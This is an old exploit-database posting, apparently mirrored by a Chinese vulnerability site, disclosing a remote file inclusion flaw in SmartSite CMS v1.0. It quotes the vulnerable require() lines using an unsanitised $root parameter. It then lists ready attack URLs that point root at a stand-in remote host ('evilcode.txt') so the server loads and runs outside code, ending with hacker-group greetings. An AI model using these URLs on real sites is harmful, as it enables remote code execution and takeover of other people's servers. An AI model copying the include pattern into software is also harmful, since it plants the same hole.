smartsite cms v1.0 Multiple Remote File include ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE Arabian Security Team ------------------------------------------------- site of script:www.smartsitecms.net ------------------------------------------------- Vulnerable: smartsite cms v1.0 ------------------------------------------------- vulnerable code: ---------------------- 1-in comment.php : require($root . "include/inc_foot.php"); --------------------------------------- 2-in /admin/test.php : require($root . "include/inc_adminfooter.php"); --------------------------------------- 3-in /admin/index.php : require($root . "admin/include/inc_adminfooter.php"); --------------------------------------- 4-in /admin/include/inc_adminfoot.php: require($root . "include/inc_footer.php"); --------------------------------------- $root parameter File include ----------------------------------------------------------------------------------------------------------------------------------------- vulnerable files : -------------------- comment.php /admin/test.php /admin/index.php /admin/include/inc_adminfoot.php ------------------------------------------------- example: www.example.com/(path)/admin/test.php?root=http://evilcode.txt? www.example.com/(path)/comment.php?root=http://evilcode.txt? www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt? www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt? ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE E-mail:KARKOR23@hotmail.com Site:www.lezr.com Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member # milw0rm.com [2006-07-01]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论